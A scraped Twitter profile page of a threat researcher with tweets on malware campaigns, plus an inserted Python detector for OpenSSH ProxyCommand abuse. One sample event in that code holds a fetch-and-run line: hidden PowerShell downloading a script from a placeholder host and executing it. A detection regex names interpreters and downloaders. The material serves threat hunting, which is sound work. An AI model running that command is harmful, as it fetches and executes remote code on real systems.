Tommy M (TheAnalyst) (@ffforward)'s Twitter Profile
Tommy M (TheAnalyst)

@ffforward

Threat Researcher @proofpoint | @Cryptolaemus1

ID: 143796933

Joined: 14-05-2010 12:22:18

4.4K Tweets

14.14K Followers

193 Following

Greg Lesnewich (@greglesnewich):

When the ecrime gang finds something… else

If you like weird infection chains, WebDAV, Python, custom backdoors with novel C2 methods, and use of Dumpulator, PCAPs, and more, the gang @selenalarson Myrtus (@Myrtus0x0) Tommy M (TheAnalyst) (@ffforward) got you covered!

proofpoint.com/us/blog/threat…

Virus Bulletin (@virusbtn):

Proofpoint researchers Tommy Madjar (@ffforward), Pim Trouerbach (@Myrtus0x0) & Selena Larson (@selenalarson) look into a suspected espionage campaign delivering the Voldemort backdoor. proofpoint.com/us/blog/threat…

Tommy M (TheAnalyst) (@ffforward):

New security brief out by me and @selenalarson and the rest of the Proofpoint Threat Insight team. This is a really interesting chain leading to the use of open-source Prince Ransomware used as first stage malware, likely meant to be a destructive attack. proofpoint.com/us/blog/threat…

Threat Insight (@threatinsight):

Threat actors are impersonating the British postal carrier Royal Mail in an attempt to deliver Prince #ransomware.

In the small campaign, most messages appear to come from contact forms posted on the target organizations’ websites.

Details in our blog: ow.ly/XLY150TAZFF.

Threat Insight (@threatinsight):

Proofpoint researchers have identified an increase in the #socialengineering technique called #ClickFix.

The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups.

Read the security brief: ow.ly/WYXX50U9eZq.

Threat Insight (@threatinsight):

Proofpoint has tracked this technique since August 2024, and calls it “brooxml”. Our researchers do not consider this a zero-day or vulnerability in general. We’ve released Emerging Threats and YARA signatures at the end of this thread.

Tommy M (TheAnalyst) (@ffforward):

Also saw sftp.exe in a similar chain, which also supports ProxyCommand=, which isn't in the #lolbas project. This #Emmenhtal/#PEAKLIGHT style chain did instead lead to #SectopRAT.

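The sftp.exe observation in the tweet above is a living-off-the-land pattern worth hunting for: the Windows OpenSSH clients (ssh.exe, sftp.exe, scp.exe) all accept -o ProxyCommand=<cmd>, and the client runs that command as a child process before any connection is made. The detection logic below is an added example written for this page; it is not code from the tweet, from Proofpoint, or from the LOLBAS project. It scans Sysmon-style process-creation events for those clients, extracts the ProxyCommand value from the command line (handling the "-o ProxyCommand=", "-oProxyCommand=" and quoted forms), and separates plain ProxyCommand use from a ProxyCommand that launches a script interpreter or downloader. The events, paths and command lines are constructed for illustration, not real telemetry.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows OpenSSH client binaries; all three accept -o ProxyCommand=<cmd>,
# which the client executes as a child process to reach the target "host".
SSH_CLIENTS = {"ssh.exe", "sftp.exe", "scp.exe"}

# Interpreters/downloaders that make a ProxyCommand look like a payload
# launcher rather than a real proxy helper. Tune this list for your estate.
INTERPRETER_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|curl|bitsadmin)\b",
    re.IGNORECASE,
)

# Tokenizer for Windows-style command lines: a token is a run of non-space
# characters in which double-quoted segments may themselves contain spaces.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
# ssh_config syntax allows both "ProxyCommand=cmd" and "ProxyCommand cmd".
PROXYCMD_RE = re.compile(r"^proxycommand[=\s]+(.*)$", re.IGNORECASE)

# Constructed Sysmon Event ID 1-style events (assumed field names); not real data.
SAMPLE_EVENTS = [
    {  # sftp.exe spawned by an HTA, ProxyCommand used to launch PowerShell
        "Image": r"C:\Windows\System32\OpenSSH\sftp.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'sftp.exe -o ProxyCommand="powershell -ep bypass -w hidden -c iwr http://example.invalid/a.ps1|iex" x@y',
    },
    {  # legitimate-looking use: corkscrew as an HTTP CONNECT proxy helper
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe",
        "CommandLine": r'ssh.exe "-oProxyCommand=C:\tools\corkscrew.exe proxy 8080 %h %p" git@github.com',
    },
    {  # ordinary sftp session, no ProxyCommand
        "Image": r"C:\Windows\System32\OpenSSH\sftp.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"sftp.exe user@files.example.invalid",
    },
    {  # the string appears, but the process is not an SSH client
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe /c echo ProxyCommand=nothing",
    },
]


@dataclass
class Hit:
    image: str
    parent: str
    proxy_command: str
    suspicious: bool


def tokenize(cmdline: str) -> List[str]:
    """Split a command line into tokens, keeping quoted spans together."""
    return [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]


def extract_proxy_command(cmdline: str) -> Optional[str]:
    """Return the ProxyCommand value from an OpenSSH client command line, or None."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks):
        if tok == "-o" and i + 1 < len(toks):
            opt = toks[i + 1]          # "-o ProxyCommand=..." form
        elif tok.startswith("-o") and len(tok) > 2:
            opt = tok[2:]              # "-oProxyCommand=..." form
        else:
            continue
        m = PROXYCMD_RE.match(opt)
        if m:
            return m.group(1).strip()
    return None


def image_name(path: str) -> str:
    """Basename of an Image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_proxycommand_hits(events: List[dict]) -> List[Hit]:
    """Flag SSH-client processes whose command line carries a ProxyCommand."""
    hits = []
    for ev in events:
        if image_name(ev["Image"]) not in SSH_CLIENTS:
            continue
        proxy = extract_proxy_command(ev["CommandLine"])
        if proxy is None:
            continue
        hits.append(Hit(
            image=ev["Image"],
            parent=ev["ParentImage"],
            proxy_command=proxy,
            suspicious=INTERPRETER_RE.search(proxy) is not None,
        ))
    return hits


if __name__ == "__main__":
    for h in find_proxycommand_hits(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if h.suspicious else "review"
        print(f"[{flag}] {h.image} (parent {h.parent}) -> ProxyCommand: {h.proxy_command}")
```

Two caveats when turning this into a production rule. ProxyCommand has legitimate uses (jump hosts, corkscrew-style proxies), so alert on the interpreter case and only review the rest, and weight the parent process (mshta.exe, wscript.exe or a browser spawning sftp.exe is far more telling than bash.exe). ProxyCommand can also be supplied from a config file (~/.ssh/config or a file passed with -F) rather than the command line, which this parser cannot see, so pair it with a rule on unexpected child processes of ssh.exe, sftp.exe and scp.exe.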
Tommy M (TheAnalyst) (@ffforward):

PDF > URL > Filtering > #ClickFix > HTA > #DOILoader /#IDATLoader > #Lumma > #NetSupport

Example PDFs: virustotal.com/gui/url/b55903…

Payload URLs: urlhaus.abuse.ch/browse/tag/Ita…
All stages: bazaar.abuse.ch/browse/tag/Ita…

Calling this #ItalianPasta b/c staging domain text for @JAMESWT_MHT 🇮🇹🍝 🤣

Gootloader (@gootloader):

⚠️ New TTPs detected for #Gootloader ⚠️ Out are the PDF conversions and back in are legal document lures. They are still using #malvertising, not SEO poisoning. 📝Full analysis: gootloader.wordpress.com/2025/03/31/goo…

Threat Insight (@threatinsight):

Proofpoint also recently observed this activity delivering #GootLoader. Google Ads for a fake document creation app (lawliner[.]com) led to a malicious document creation website, on which users are directed to enter their email address.

Threat Insight (@threatinsight):

New e-crime insights: TA4557, known for distributing More_eggs malware, notably expanded to an int'l audience in recent campaigns. Per our data, the recruiter-focused TA was seen targeting orgs in France, England & Ireland, in addition to typical North America-targeted threats.

Threat Insight (@threatinsight):

Proofpoint Threat Insight identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys. We first spotted this post by ANY.RUN about ClickFix delivering Rhadamanthys and began investigating. 🔍

Threat Insight (@threatinsight):

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they

Threat Insight (@threatinsight):

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to

Threat Insight (@threatinsight):

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues. 🧵

Threat Insight (@threatinsight):

Since 14 Oct., we’ve tracked a high volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020.

Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

Ole Villadsen (@olevilladsen):

Remote access, real cargo: cybercriminals targeting trucking and logistics | Proofpoint US #cybercrime #shipping #cargo #freight #trucking #rmm #fleetdeck #logmein #nable #pdqconnect #screenconnect #simplehelp proofpoint.com/us/blog/threat…

Threat Insight (@threatinsight):

Proofpoint is proud to have assisted law enforcement in the #OperationEndgame investigation that led to the Nov. 13, 2025 disruption of #Rhadamanthys and #VenomRAT—#malware used by multiple cybercriminals.

Rhadamanthys: brnw.ch/21wXsCc
VenomRAT: brnw.ch/21wXsCd